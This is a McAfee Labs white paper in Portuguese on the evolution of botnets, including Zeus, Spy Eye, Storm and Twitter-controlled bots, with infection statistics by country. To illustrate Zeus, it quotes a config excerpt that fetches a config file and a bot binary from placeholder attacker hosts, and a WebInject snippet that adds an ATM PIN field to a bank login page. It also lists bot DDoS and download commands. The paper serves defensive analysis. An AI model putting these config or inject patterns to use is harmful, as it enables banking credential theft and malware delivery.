Docstoc

A nova era das redes de bots

Document Sample
A nova era das redes de bots Powered By Docstoc
					White Paper




A nova era das redes de bots
Por Zheng Bu, Pedro Bueno, Rahul Kashyap
e Adam Wosotowsky

McAfee Labs™
White Paper      A nova era das redes de bots




Sumário
Uma indústria se desenvolve                                     3

Evolução                                                        4
  Bots de IRC                                                   4
  Bots locais                                                   4
  Bots P2P                                                      4
  Bots HTTP                                                     5
  Spy Eye                                                       7

Predomínio global                                               8

Classificação das redes de bots: Principais ameaças por país    9

O papel dos governos                                           10

Quem está em risco?                                            11

Uma perspectiva do futuro                                      11
  Uma nova era de zumbis sociais?                              12
  Quanto mais oculto, melhor                                   13

Combate através da Global Threat Intelligence                  14

Referências                                                    14

Sobre o McAfee Labs™                                           14

Sobre a McAfee                                                 14
White Paper      A nova era das redes de bots




As redes de bots (robôs), popularmente conhecidas como “botnets”, têm uma história variada.
Um bot é, basicamente, uma série de scripts ou comandos, ou um programa desenvolvido para
se conectar a algo (normalmente um servidor) e executar um comando ou uma série de comandos.
Essencialmente, ele desempenha várias funções. Ele não precisa ser malicioso ou nocivo.
Os bots e seus usos evoluíram de simples observadores de canais ou jogos (por exemplo, os bots
Bartender de Wisner e Game Manager de Lindahl) para fornecedores de serviços especializados,
como gerenciamento de bancos de dados ou manutenção de listas de acesso. Este relatório aborda
um uso muito diferente: O “arrebanhamento” de bots (também chamados de “drones” ou zumbis)
por cibercriminosos para apoiar suas atividades criminosas.
Como afetam corporações, essas atividades criminosas podem incluir roubo de segredos
comerciais, inserção de malware em arquivos de código-fonte, interrupção de acesso ou de serviços,
comprometimento da integridade dos dados e roubo de informações de identidade de funcionários.
Os resultados para uma empresa podem ser desastrosos e provocar perda de lucros, de conformidade
regulatória, da confiança dos clientes, de reputação e até da própria empresa. Para organizações
governamentais, as preocupações vão ainda mais longe.
Veremos como os bots criminosos evoluíram, a indústria que apoia sua criação e distribuição e como
eles são utilizados atualmente por vários grupos cibercriminosos. Também sugerimos o rumo que os
bots tomarão no futuro próximo.

Uma indústria se desenvolve
A indústria das redes de bots apresentou uma espécie de “curva de crescimento” (embora não no bom
sentido). Nos primeiros anos deste século, os bots e as redes de bots eram criados por programadores
com um bom conhecimento de redes e protocolos, como o Internet Relay Chat (IRC). A utilização do
IRC deu início à tendência em direção ao comando e controle centralizado, frequentemente conhecido
como C&C. O SDBot, um dos primeiros e mais conhecidos bots, foi codificado em C++. (O SDBot
teve grande propagação porque seu autor publicou o código-fonte — uma prática muito incomum.)
Versões posteriores do SDBot, também conhecidas como SpyBot, começaram a explorar vulnerabilidades
de chamadas a procedimentos remotos da Microsoft; portanto, seus programadores precisavam do
conhecimento de como codificar explorações para criar tais bots. Nessa época, os bots e redes de bots
vicejavam explorando múltiplas vulnerabilidades que estavam amplamente disponíveis nas plataformas
Microsoft Windows mais comuns. Os bots que surgiram posteriormente, na última década, acumularam
as capacidades de lançar ataques de negação de serviço (DoS), fazer varredura de portas e registrar
pressionamentos de teclas, entre outras funções. Os autores desses malwares precisavam conhecer
linguagem assembly, além de bons fundamentos em redes. O RBot (2003) foi um dos primeiros a usar
esquemas/compactadores de compressão e criptografia, como UPX, Morphine e ASPack. Essas exigências
introduziram um novo nível de codificadores habilidosos que compreendiam esquemas de criptografia
e como empregar técnicas de evasão ao criar seus binários.
A essa altura, não havia mais retorno. O sucesso do RBot abriu caminho para a ampla aceitação da
criptografia e da ocultação em bots e redes de bots. Um dos principais desenvolvimentos no controle
de redes de bots foi o uso de redes ponto a ponto (“peer-to-peer” ou P2P) para comunicação pelo Sinit
(2003) e pelo Phatbot (2004). Essa manobra mudou completamente a equação da comunicação das
redes de bots. Uma das redes de bots mais sofisticadas com base em P2P surgidas posteriormente foi
a Storm Worm/Nuwar (2007), que utilizava uma arquitetura P2P descentralizada e que foi, por algum
tempo, excepcionalmente difícil de combater.
A necessidade de sofisticação na tecnologia das redes de bots é impulsionada pelas várias soluções de
segurança do mercado que combatem esses desafios. A sofisticação dos próprios bots e redes de bots
também obriga as tecnologias de segurança a evoluir, criando um relacionamento medida-contramedida
muito complexo entre os criadores de malware e os fornecedores de segurança.
É evidente que os bots e as redes de bots aumentaram muito em complexidade. Os programadores
desse tipo de malware precisam de um nível avançado de conhecimento de redes, sistemas e criptografia.
Considerando-se o volume e o nível de sofisticação das redes de bots, é altamente provável que elas
sejam criadas, não por um pequeno grupo de pessoas, mas por uma agremiação de indivíduos altamente
motivados pelo retorno financeiro de sua empreitada. A motivação é óbvia: subverter e comprometer
empreendimentos e roubar dados que tenham valor monetário.



                                                                                                         3
White Paper       A nova era das redes de bots




Evolução

Bots de IRC
Os primeiros bots nem sempre eram maliciosos. Porém, isso é bem menos comum atualmente,
especialmente nos últimos seis anos, desde a explosão das redes de bots por volta de 2004. Antes disso,
a maioria dos bots utilizava o IRC como protocolo de controle.
O IRC foi utilizado pela primeira vez para conexão a salas de bate-papo, as quais permitiam às pessoas
trocar mensagens, o que era muito comum de 10 a 15 anos atrás. No entanto, com o advento dos
protocolos de mensagens instantâneas, como ICQ, AIM e MSN Messenger, o IRC perdeu um pouco de sua
popularidade, mas ainda é utilizado por muitos profissionais de rede e de segurança da “velha-guarda”.
Os primeiros bots foram criados para se registrarem nessas salas de bate-papo (frequentemente
chamadas de canais), assegurar que o canal permanecesse aberto, reconhecer os operadores do canal
e dar a eles o controle sobre o canal.
A estratégia mais comum consistia em criar bots que pudessem fazer varredura de uma rede e tirar
proveito de máquinas que contivessem vulnerabilidades antigas ou novas. Uma vez comprometida uma
máquina, o bot poderia conectar-se a uma sala de bate-papo (canal) específica e receber instruções
do mestre de bots, como iniciar um ataque DoS contra um site. Esse comportamento ainda se vê
atualmente, como no recente ataque W32/Vulcanbot contra sites de ativistas de direitos humanos.
Outras funções de IRC comuns são capturar imagens de tela do host, fazer download ou atualizar
um bot, etc. Alguns bots podem executar mais de 100 comandos.
Observamos um número enorme de novos bots em 2004 devido ao lançamento de vários aplicativos
de interface gráfica que permitiam aos hackers criar bots apenas apontando e clicando. Essa simplicidade
foi um avanço significativo para cibercriminosos e criadores de malware: pessoas que não sabiam
desenvolver programas e que tinham pouco conhecimento sobre protocolos de rede e sistemas operacionais
passaram a poder criar uma ampla variedade de bots simplesmente clicando com um mouse.

Bots locais
Os bots funcionam quase que exclusivamente em versões do Windows, mas versões locais também surgiram.
Utilizando a linguagem de script Perl, hackers criaram versões executadas em diversas variantes de Unix e
Linux. Os criadores foram o grupo brasileiro de hackers Atrix-Team — na ocasião, uma mera agremiação de
escritores de scripts. Devido ao formato “aberto”, ainda se veem muitas dessas versões atualmente.

Bots P2P
Redes de bots IRC da “velha-guarda” ainda são comuns, mas têm uma vulnerabilidade intrínseca:
o servidor IRC. Quando o servidor é tirado do ar, o hacker perde o controle sobre o exército de bots.
Em 2007 surgiu um novo tipo de rede de bots utilizando o protocolo P2P. Trata-se do mesmo protocolo
que muitos programas utilizam, por exemplo, para fazer download de músicas. Uma dessas redes
de bots utilizava uma implementação de criptografia com base no protocolo eDonkey. Esse malware
ganhou uma notoriedade considerável: Originalmente chamava-se W32/Nuwar, mas depois ficou
famoso como worm Storm.
O Storm continha aproximadamente 100 pontos pré-gravados como valores hash, os quais o malware
descriptografava e utilizava para verificar se havia novos arquivos para baixar. Todas as transações
eram criptografadas, portanto, apenas o próprio malware podia descriptografar e reagir à resposta.
As respostas geralmente levavam a URLs que faziam download de outros binários.
O Storm foi responsável pela grande maioria do spam durante os anos de 2007 e 2008, até ser tirado do ar.
A vantagem da abordagem P2P é sua estrutura de controle distribuída e resistente, o que a torna mais
difícil de derrubar do que uma rede de bots controlada por IRC. No entanto, esse tipo é mais difícil de
manter e disseminar devido à sua complexidade.
Ainda no final de abril, vimos mais um malware que compartilhava partes do mesmo código —
responsável por envio de spam e ataques DoS — que o Storm.




                                                                                                          4
White Paper       A nova era das redes de bots




Bots HTTP
Dois ou três anos atrás, vimos uma mudança no controle de muitas redes de bots, de canais IRC para
sites, utilizando HTTP. Essa mudança para um protocolo comum foi uma manobra inteligente por parte
dos cibercriminosos e criadores de malware.
A evolução para HTTP começou com avanços em “kits de exploração”. Esses kits, desenvolvidos
principalmente por cibercriminosos russos, incluem Mpack, ICEPack e Fiesta. Eles podem instalar
software em máquinas remotas e controlá-las a partir de um site remoto. O cibercriminoso envia
spam ou uma mensagem instantânea com uma variedade de links para vítimas potenciais. Esses links
levam a um site com o kit de exploração instalado. Uma vez lá, o kit determina qual exploração
utilizar, dependendo do país, versão do sistema operacional, versão do navegador e até múltiplas
versões de aplicativos clientes instalados na máquina da vítima. Tudo isso ocorre dinamicamente e
sem o conhecimento da vítima. Se a exploração for bem-sucedida, ela pode instalar posteriormente
um coquetel de malwares para obter controle remoto sobre a máquina infectada.
De todas as atuais redes de bots HTTP, um caso muito especial é a Zeus (também conhecida como Zbot),
especializada em roubar credenciais bancárias. A rede Zeus consiste em um elemento cliente e um
elemento servidor. O servidor possui um construtor que ajuda o mestre de bots a criar uma variante
cliente do malware PWS-ZBot (sua identificação técnica), a qual infecta uma máquina, tornando-a parte
da rede de bots ao conectá-la a um site remoto que hospeda o servidor Zeus.
Zeus segue uma tendência interessante: tornar fácil para qualquer um criar uma versão personalizada
do malware. O kit de ferramentas Zeus é bem caro para ser comprado, mas seu autor adotou amplas
medidas para assegurar que a ferramenta seja fácil de usar, o que também facilita sua venda para
muitas pessoas, aumentando assim os lucros do autor.
O exemplo seguinte mostra o Zeus Builder na versão 1.2.x:




O painel esquerdo contém apenas duas opções: “Information” (informação) e “Builder” (construtor).
Selecionar “Information” permite saber se a máquina está infectada com o Zeus. Selecionar “Builder”
ajuda a pessoa que controla o kit de ferramentas a construir um novo bot. O kit utiliza dois arquivos
de entrada: Config e WebInjects. Embora o construtor tenha um botão para editar o arquivo Config,
o botão é apenas um atalho. Nós utilizamos o Bloco de Notas para editar o arquivo. O arquivo Config
contém os parâmetros que o bot seguirá.




                                                                                                        5
White Paper      A nova era das redes de bots




Exemplos de Config:
…
url_config “http://www.[EndereçoIPdosMalfeitores].cn/cp/config.bin”
url_compip “http://www.[EndereçoIPdosMalfeitores].com/” 2048
encryption_key “12345654321”
;blacklist_languages 1049
end


entry “DynamicConfig”
url_loader “http://www.[EndereçoIPdeOutroMalfeitor].cn/cp/bot.exe”
…
Esse trecho de Config diz ao bot onde ele deve ir para fazer download do arquivo de configuração
e do próprio bot. Essas etapas asseguram que os controladores de bots possam atualizar seus bots
e configurações com novos recursos e novos alvos a qualquer momento. As medidas também permitem
que os mestres de bots distribuam o arquivo de configuração e o binário do bot para servidores
diferentes, incorporando a capacidade de recuperação proporcionada pela arquitetura distribuída.
O segundo arquivo para construção do bot é o WebInject. Esse arquivo especifica os alvos, ou seja,
as vítimas das quais o criador do malware ou o dono do kit de ferramentas deseja arrancar informações.
O Zeus tem a capacidade de não apenas arrancar informações da página da Web original, mas também
de inserir campos adicionais. Portanto, ele pode conseguir até mais informações, se o dono do kit de
ferramentas o desejar.
Exemplo de WebInject:
…
set_url https://www.[GrandeVítimaBancária].com/* G
data_before
<span class=”mozcloak”><input type=”password”*/></span>
data_end
data_inject
<br><strong><label for=”atmpin”>ATM PIN</label>:</strong>&nbsp;<br />
<span class=”mozcloak”><input type=”password” accesskey=”A” id=”atmpin” name=”USpass”
size=”13” maxlength=”14” style=”width:147px” tabindex=”2” /></span>
data_end
data_after
data_end
…
Esse código obtém as informações no URL de destino, o qual, neste exemplo, é de um banco. Além de
roubar o nome de usuário e a senha, o Zeus injeta um outro campo para o número PIN do caixa eletrônico.




                                                                                                     6
White Paper       A nova era das redes de bots




Como tende a acontecer com qualquer malware bem-sucedido, o Zeus gerou várias versões do
construtor adulteradas por hackers. Muitas até vêm com “backdoors” próprios. Que ironia!
Uma versão adulterada aparece na imagem de tela seguinte:




Essa versão, chamada MultiBuilder, criou duas variantes com base na versão 1.3 do Zeus.
Recentemente vimos o Zeus pular da versão 1.3 para a 2.0, a qual agora contém um modelo de licença
bem rigoroso. O Zeus é efetivamente vinculado à máquina física do comprador utilizando uma licença de
software comercial! O canal de criação e distribuição desse malware demonstra um forte tino comercial!

Spy Eye
Spy Eye é mais um exemplo de um bot HTTP complexo. Ele tem várias semelhanças com o Zeus,
principalmente por também ser um capturador de formulários e por sua impressionante arquitetura
de controle.
Como o Zeus, o Spy Eye tem seu próprio construtor gráfico:




                                                                                                         7
White Paper          A nova era das redes de bots




Um recurso interessante do Spy Eye é sua capacidade de “eliminar” (remover) o Zeus da máquina
que ele infecta, criando um conflito interessante dentro do mundo dos criadores de malware.
Não é a primeira vez que vemos criadores de malware brigarem entre si. Para evitar análises feitas
por seus alvos, tanto o Zeus quanto o Spy Eye oferecem a opção de utilizar uma chave de criptografia
durante o processo de construção dos bots. Nas primeiras versões do Zeus, essa chave era predefinida,
o que dava às forças de segurança uma maneira muito mais rápida de analisar e descobrir os alvos do
malware. Com esse novo recurso, os malfeitores certamente levaram a briga a um outro nível.

Predomínio global

         Distribuição geral de redes de bots por país

                                                                   Índia
                                                                   Brasil
                                                                   Rússia
                                                                   Alemanha
                                                                   Estados Unidos
                                                                   Grã-Bretanha
                                                                   Colômbia
                                                                   Indonésia
                                                                   Itália
                                                                   Espanha
                                                                   Argentina
                                                                   Polônia
                                                                   Paquistão
                                                                   Portugal
                                                                   Vietnã
                                                                   Coréia do Sul
                                                                   Grécia
                                                                   China
                                                                   Belarus
                                                                   Austrália
                                                                   Outros



Figura 1: O McAfee Labs detectou mais infecções por redes de bots na Índia do que em qualquer outro país —
quase 1,5 milhão. Brasil, Rússia e Alemanha também excederam um milhão de infecções detectadas.




                                                                                                             8
                                          White Paper      A nova era das redes de bots




Classificação das redes de bots: Principais ameaças por país

        Alemanha                               Argentina                                    Austrália                       Belarus        Asprox
                           Asprox                                Asprox                                  Asprox

                           Bagle-CB                              Bagle-CB                                Bagle-CB                          Bagle-CB

                           Bobax                                 Bobax                                   Bobax                             Bobax

                           Cimbot                                Cimbot                                  Cimbot                            Cimbot

                           Cutwail                               Cutwail                                 Cutwail                           Cutwail

                           Cutwail2                              Cutwail2                                Cutwail2                          Cutwail2

                                                                 DarkMailer                              DarkMailer                        DarkMailer
                           DarkMailer
                                                                 Dlena                                   Dlena                             Dlena
                           Dlena
                                                                 Donbot                                  Donbot                            Donbot
                           Donbot
                                                                 Festi                                   Festi                             Festi
                           Festi
                                                                 Gheg                                    Gheg                              Gheg
                           Gheg
                                                                 Grum                                    Grum                              Grum
                           Grum
                                                                 Grum2                                   Grum2                             Grum2
                           Grum2
                                                                 HelloGirl                               HelloGirl                         HelloGirl
                           HelloGirl
                                                                 Lethic                                  Lethic                            Lethic
                           Lethic
                                                                 Maazben                                 Maazben                           Maazben
                           Maazben
                                                                 Mega-D                                  Mega-D
                                                                                                                                           Mega-D
                           Mega-D
                                                                 Netsky                                  Netsky
                                                                                                                                           Netsky
                           Netsky
                                                                 Outros                                  Outros
                                                                                                                                           Outros
                           Outros
                                                                 RK1                                     RK1
                                                                                                                                           RK1
                           RK1
                                                                 RK2                                     RK2
                                                                                                                                           RK2
                           RK2
                                                                                                         Reposin
                                                                 Reposin                                                                   Reposin
                           Reposin
                                                                                                         Rustock
                                                                 Rustock                                                                   Rustock
                           Rustock                                                                       Storm
                                                                 Storm                                                                     Storm
                           Storm                                                                         TwitGenPhish
                                                                 TwitGenPhish                                                              TwitGenPhish
                           TwitGenPhish                                                                  Xarvester
                                                                 Xarvester                                                                 Xarvester
                           Xarvester




         Brasil          Asprox
                                                   China                   Asprox
                                                                                            Colômbia        Asprox
                                                                                                                           Coréia do Sul     Asprox
                         Bagle-CB                                          Bagle-CB                         Bagle-CB                         Bagle-CB
                         Bobax                                             Bobax                            Bobax                            Bobax
                         Cimbot                                            Cimbot                           Cimbot                           Cimbot
                         Cutwail                                           Cutwail                          Cutwail                          Cutwail
                         Cutwail2                                          Cutwail2                         Cutwail2                         Cutwail2
                         DarkMailer                                                                                                          DarkMailer
                                                                           DarkMailer                       DarkMailer
                         Dlena                                                                                                               Dlena
                                                                           Dlena                            Dlena
                         Donbot                                                                                                              Donbot
                                                                           Donbot                           Donbot
                         Festi                                                                                                               Festi
                                                                           Festi                            Festi
                         Gheg
                                                                           Gheg                             Gheg                             Gheg
                         Grum
                                                                           Grum                             Grum                             Grum
                         Grum2
                                                                           Grum2                            Grum2                            Grum2
                         HelloGirl
                                                                           HelloGirl                        HelloGirl                        HelloGirl
                         Lethic
                                                                           Lethic                           Lethic                           Lethic
                         Maazben
                                                                           Maazben                          Maazben                          Maazben
                         Mega-D
                                                                           Mega-D                           Mega-D                           Mega-D
                         Netsky
                                                                           Netsky                           Netsky                           Netsky
                         Outros
                                                                           Outros                           Outros                           Outros
                         RK1
                                                                           RK1                              RK1                              RK1
                         RK2
                                                                                                            RK2                              RK2
                         Reposin                                           RK2
                                                                                                                                             Reposin
                         Rustock                                           Reposin                          Reposin
                                                                                                                                             Rustock
                         Storm                                             Rustock                          Rustock
                                                                                                                                             Storm
                         TwitGenPhish                                      Storm                            Storm
                                                                                                                                             TwitGenPhish
                         Xarvester                                         TwitGenPhish                     TwitGenPhish
                                                                                                                                             Xarvester
                                                                           Xarvester                        Xarvester




        Espanha                                Estados Unidos             Asprox
                                                                                          Grã-Bretanha   Asprox
                                                                                                                             Grécia
                          Asprox                                                                                                           Asprox

                          Bagle-CB                                        Bagle-CB                       Bagle-CB                          Bagle-CB

                          Bobax                                           Bobax                          Bobax                             Bobax

                          Cimbot                                          Cimbot                         Cimbot                            Cimbot
                          Cutwail                                         Cutwail                        Cutwail                           Cutwail
                          Cutwail2                                        Cutwail2                       Cutwail2                          Cutwail2
                                                                          DarkMailer                     DarkMailer                        DarkMailer
                          DarkMailer
                                                                          Dlena                          Dlena
                          Dlena                                                                                                            Dlena
                                                                          Donbot                         Donbot
                          Donbot                                                                                                           Donbot
                                                                          Festi                          Festi
                          Festi                                                                                                            Festi
                                                                          Gheg                           Gheg
                          Gheg                                                                                                             Gheg
                                                                          Grum                           Grum
                          Grum                                                                                                             Grum
                                                                          Grum2                          Grum2
                          Grum2                                                                                                            Grum2
                                                                          HelloGirl                      HelloGirl
                          HelloGirl                                                                                                        HelloGirl
                                                                          Lethic                         Lethic
                          Lethic                                                                                                           Lethic
                                                                          Maazben                        Maazben
                          Maazben                                                                                                          Maazben
                                                                          Mega-D                         Mega-D
                          Mega-D                                                                                                           Mega-D
                                                                          Netsky                         Netsky
                          Netsky                                                                                                           Netsky
                                                                          Outros                         Outros
                          Outros                                                                                                           Outros
                                                                          RK1                            RK1
                          RK1                                                                                                              RK1
                                                                          RK2                            RK2
                          RK2                                                                                                              RK2
                                                                          Reposin                        Reposin
                          Reposin                                                                                                          Reposin
                                                                                                         Rustock
                          Rustock                                         Rustock
                                                                                                                                           Rustock
                                                                                                         Storm
                          Storm                                           Storm
                                                                                                                                           Storm
                                                                                                         TwitGenPhish
                          TwitGenPhish                                    TwitGenPhish
                                                                                                                                           TwitGenPhish
                                                                                                         Xarvester
                          Xarvester                                       Xarvester
                                                                                                                                           Xarvester




                                                                                                                                                         9
                         White Paper          A nova era das redes de bots




 Índia                            Indonésia                                    Itália                     Asprox
                                                                                                                         Paquistão
          Asprox                                          Asprox                                                                       Asprox

          Bagle-CB                                        Bagle-CB                                        Bagle-CB                     Bagle-CB

          Bobax                                           Bobax                                           Bobax                        Bobax

          Cimbot                                          Cimbot                                          Cimbot                       Cimbot

          Cutwail                                         Cutwail                                         Cutwail                      Cutwail

          Cutwail2                                        Cutwail2                                        Cutwail2                     Cutwail2

          DarkMailer                                      DarkMailer                                      DarkMailer                   DarkMailer

          Dlena                                           Dlena                                           Dlena                        Dlena

          Donbot                                          Donbot                                          Donbot                       Donbot

          Festi                                           Festi                                           Festi                        Festi

          Gheg                                                                                            Gheg                         Gheg
                                                          Gheg
          Grum                                                                                            Grum                         Grum
                                                          Grum
          Grum2                                                                                           Grum2                        Grum2
                                                          Grum2
          HelloGirl                                                                                       HelloGirl                    HelloGirl
                                                          HelloGirl
          Lethic                                                                                          Lethic                       Lethic
                                                          Lethic
          Maazben                                                                                         Maazben                      Maazben
                                                          Maazben
          Mega-D                                                                                                                       Mega-D
                                                          Mega-D                                          Mega-D
          Netsky                                                                                                                       Netsky
                                                          Netsky                                          Netsky
          Outros                                                                                                                       Outros
                                                          Outros                                          Outros
          RK1                                                                                                                          RK1
                                                          RK1                                             RK1
          RK2                                                                                                                          RK2
                                                          RK2                                             RK2
                                                                                                                                       Reposin
          Reposin                                                                                         Reposin
                                                          Reposin
                                                                                                                                       Rustock
          Rustock                                                                                         Rustock
                                                          Rustock
                                                                                                                                       Storm
          Storm                                                                                           Storm
                                                          Storm
                                                                                                                                       TwitGenPhish
          TwitGenPhish                                                                                    TwitGenPhish
                                                          TwitGenPhish
                                                                                                                                       Xarvester
          Xarvester                                                                                       Xarvester
                                                          Xarvester




Polônia   Asprox
                                   Portugal                                 Rússia              Asprox
                                                                                                                          Vietnã
                                                        Asprox                                                                         Asprox
          Bagle-CB                                      Bagle-CB                                Bagle-CB                               Bagle-CB
          Bobax                                         Bobax                                   Bobax                                  Bobax
          Cimbot                                        Cimbot                                  Cimbot                                 Cimbot
          Cutwail                                       Cutwail                                 Cutwail                                Cutwail
          Cutwail2                                      Cutwail2                                Cutwail2                               Cutwail2
          DarkMailer                                    DarkMailer                              DarkMailer                             DarkMailer
          Dlena                                         Dlena                                   Dlena                                  Dlena
          Donbot                                        Donbot                                  Donbot                                 Donbot
          Festi                                         Festi                                   Festi                                  Festi
          Gheg                                          Gheg                                    Gheg                                   Gheg
          Grum                                          Grum                                    Grum                                   Grum
          Grum2                                         Grum2                                   Grum2                                  Grum2
          HelloGirl                                     HelloGirl                               HelloGirl                              HelloGirl
          Lethic                                        Lethic                                  Lethic                                 Lethic
          Maazben                                       Maazben                                 Maazben                                Maazben
          Mega-D                                        Mega-D                                  Mega-D                                 Mega-D
          Netsky                                        Netsky                                  Netsky                                 Netsky
          Outros                                        Outros                                  Outros                                 Outros
          RK1                                           RK1                                     RK1                                    RK1
          RK2                                           RK2                                     RK2                                    RK2
          Reposin                                       Reposin                                 Reposin                                Reposin
          Rustock                                       Rustock                                 Rustock                                Rustock
          Storm                                         Storm                                   Storm                                  Storm
          TwitGenPhish                                  TwitGenPhish                            TwitGenPhish                           TwitGenPhish
          Xarvester                                     Xarvester                               Xarvester                              Xarvester




                         Figura 2: As maiores redes de bots, por país. Rustock é, disparada, a rede de bots mais “popular” do mundo.



                         O papel dos governos
                         À medida que crescer a ameaça da guerra cibernética e aumentar o dano que ela pode causar,
                         provavelmente veremos as redes de bots serem utilizadas como armas em conflitos futuros.
                         Elas podem já ter sido empregadas.
                         Em nosso mundo cada vez mais tecnológico, comunicações eficazes são de suma importância
                         na administração de qualquer crise. A organização de recursos e sua mobilização para enfrentar
                         eventos de causas naturais ou humanas dependem muito da Internet, uma ferramenta essencial
                         para disseminação de informações para uma gama de partes interessadas e para coordenação de
                         suas reações. A degradação ou interrupção desse fluxo de informações pode tornar um evento ruim
                         ainda pior. A Internet pode se tornar mais um campo de batalha.
                         Eventos como o recente derramamento de óleo no Golfo do México, as explosões na Europa e no
                         Iraque ou as escaramuças navais entre os coreanos podem ser afetados por interrupções intencionais
                         dos canais de notícias ou das equipes de resposta a emergências, os quais dependem da Internet.
                         Redes de bots podem ser compradas ou alugadas no mercado negro e podem até ser tomadas de seus
                         donos e redirecionadas para novos propósitos. Sabemos que tais coisas acontecem regularmente, portanto,
                         seria ingenuidade não esperar que organizações governamentais ou países de todo o mundo tenham se
                         envolvido na aquisição de capacidades de redes de bots para necessidades ofensivas e contra-ofensivas.
                         Uma entidade cívica ou nacional tem bons motivos para capturar uma rede de bots de seus mestres
                         atuais. As redes de bots infiltram corporações, indivíduos e escritórios governamentais, bem como estações
                         de trabalho militares. É da maior importância que os direitos intelectuais e de privacidade dos cidadãos
                         e instituições do mundo todo sejam protegidos daqueles que os utilizariam ilegalmente. Assumir o
                         controle de uma rede de bots obriga o novo controlador a escolher uma estratégia: (a) derrubar o sistema,


                                                                                                                                                    10
White Paper       A nova era das redes de bots




o que poderia incapacitar as máquinas que fazem parte da rede de bots, prejudicar significativamente
a infraestrutura e, possivelmente, tornar o novo mestre responsável pelos danos causados; (b) deixar a rede
de bots ociosa até que todos os nós infectados sejam atualizados e não estejam mais sob controle ou (c)
monitorar a rede de bots para identificar e capturar o mestre de bots. Cada uma dessas etapas é controversa.

Quem está em risco?
Todos os usuários de computador correm risco porque todos navegam na mesma Internet. Existe apenas
um punhado de maneiras pelas quais os cibercriminosos podem infectar um host ou rede com seus bots
(ou com qualquer forma de software malicioso). Essas maneiras normalmente envolvem alguma forma de
engenharia social, a qual pode ser definida como “hackear” a mente humana. Os atacantes utilizam um
plano ou isca para induzir os usuários de computador a clicar em um link ou instalar um programa, o que,
em condições normais, eles não fariam. Uma das técnicas mais inteligentes e predominantes de hoje em
dia é a utilização, pelos cibercriminosos, de notícias de grande repercussão como isca em seus esquemas.
Os cibercriminosos leem as mesmas histórias que nós e sabem quantas pessoas recebem suas notícias via
on-line. Seja um link supostamente de um vídeo de um desastre atual ou o drama de alguma celebridade
popular, esses estratagemas atraem os usuários como abelhas ao mel. Com seu conhecimento sobre
o comportamento humano e sobre o que os usuários procuram on-line, esses atacantes bem poderiam
ensinar alguns truques a “marqueteiros” profissionais. Precisamos ficar cientes dos riscos da navegação
e utilização de tecnologias Web 2.0 porque os cibercriminosos usam as notícias contra nós.
Todo indivíduo precisa se precaver contra ataques em redes sociais, mas as empresas e os governos sofrem
os danos mais pesados com os ataques de redes de bots. Algumas das ameaças para as empresas são:
•	 Fraude de cliques: visitar páginas da Web e clicar automaticamente em “banners” de anúncios para
   roubar grandes somas de dinheiro das empresas de anúncios on-line.
•	 Ataques de negação de serviço distribuído (DDoS): saturação da largura de banda para impedir
   o tráfego legítimo. Esses ataques são frequentemente realizados por concorrentes, clientes insatisfeitos
   ou com objetivos políticos.
•	 Infiltração de sistemas de arquivos: acesso a sistemas críticos para roubar dados de clientes,
   informações particulares de funcionários, segredos comerciais, finanças corporativas, etc.
•	 Desativação da segurança existente: ato de evitar iniciativas de limpeza ou sequestro por donos
   de bots rivais.
•	 Spams: utilização de recursos e largura de banda de outros sistemas para enviar volumes imensos de spam.

•	 Infecção de código-fonte: envenenamento de toda a árvore do código-fonte através da inserção de
   alterações não autorizadas e indetectáveis ou da descoberta de vulnerabilidades adicionais para explorar.
Os resultados desses ataques podem ser bastante graves, custando às empresas uma quantidade
significativa de tempo e mão-de-obra para limpar. Além disso, as empresas podem ter revogado seu status
de conformidade regulatória ou industrial. Responsabilidades jurídicas também são prováveis em relação
a clientes, funcionários e outros afetados pelas medidas de segurança inadequadas de uma empresa.
Para governos e proprietários de infraestruturas críticas, os danos causados por redes de bots podem
ser ainda mais amplos:
•	 Ataques DoS podem interromper comunicações durante uma crise.
•	 Infecções de código-fonte podem causar a paralisação de redes críticas.
•	 Sistemas críticos de acesso podem fornecer informações militares aos inimigos.



Uma perspectiva do futuro
Nos últimos seis anos, as redes de bots tornaram-se uma das maiores ameaças, não apenas para
profissionais de cibersegurança, mas também para usuários corporativos e consumidores — praticamente
qualquer um que tenha um computador. As redes de bots tornaram-se a infraestrutura mais essencial
utilizada por cibercriminosos e governos para lançar quase todo tipo de ataque cibernético: espionagem,
roubo ou vazamento de dados, spam e ataques de negação de serviço distribuído.
O McAfee Labs já percebeu uma tendência significativa em direção a uma infraestrutura de rede de bots
mais resistente e mais distribuída — contando com tecnologias robustas, como P2P, controle com base
na Web e serviços Web 2.0, bem como técnicas de evasão e redundância.



                                                                                                         11
White Paper        A nova era das redes de bots




Uma nova era de zumbis sociais?
Conforme os serviços Web 2.0 evoluem, o mesmo acontece com os criadores das redes de bots,
que rapidamente adotam novas tecnologias para aumentar a sofisticação de seus ataques.
Quando este documento estava sendo redigido, KeriosC2 era uma ferramenta conceitual para
demonstrar que LinkedIn, Twitter e TinyURL podem ser utilizados para controlar uma rede de bots.
Usuários de computador do mundo inteiro desfrutam da engenharia social, e agora, as redes de
bots também. Isso não é um bom desdobramento.




Com a tendência das redes de bots de funcionar por cima de aplicativos e protocolos comuns, suas
comunicações serão um desafio maior do que nunca para se detectar e prever.
Um desdobramento adicional ocorreu em maio, quando alguns bots começaram a usar o Twitter para
receber comandos. Por enquanto, a funcionalidade é bastante simples: apenas um monitoramento
(ou “seguimento”) de uma conta do Twitter para receber comandos. Como você pode ver na tela
seguinte, o construtor com interface gráfica é bastante simples.




Ao contrário do Zeus ou do Spy Eye, bem mais complexos, essa forma não contém opção alguma, apenas
um campo para se digitar um nome de usuário do Twitter, o qual o bot seguirá para receber comandos.
Durante a redação deste documento, a sintaxe e a estrutura dos comandos também eram básicas:
.VISIT: Para abrir uma página específica
.DOWNLOAD: Para fazer download de um arquivo de um local remoto
.DDOS: Para causar uma negação de serviço em uma vítima




                                                                                                   12
White Paper       A nova era das redes de bots




Quanto mais oculto, melhor
Os criadores de redes de bots adotaram muitas abordagens para evitar detecções por dispositivos
ou softwares de segurança. No que se refere ao processo, os criadores de malware costumam testar
seu malware com a maioria dos produtos dos principais fornecedores de segurança para assegurar
que haja pouca ou nenhuma detecção. Como resultado, os cibercriminosos e criadores de malware
frequentemente anunciam seu malware como “à prova de detecção”.
O cumprimento de políticas com base em IP ou listas de controle de acesso pode ser um controle eficaz
contra conexões originárias de um bot para seus servidores de controle. Os criadores de malware e redes
de bots reagiram a esse contra-ataque implementando algoritmos de fluxo em vez de utilizar listas de IP
predefinidas para seus servidores de comando. O Zeus utiliza essa técnica para gerar domínios na hora.
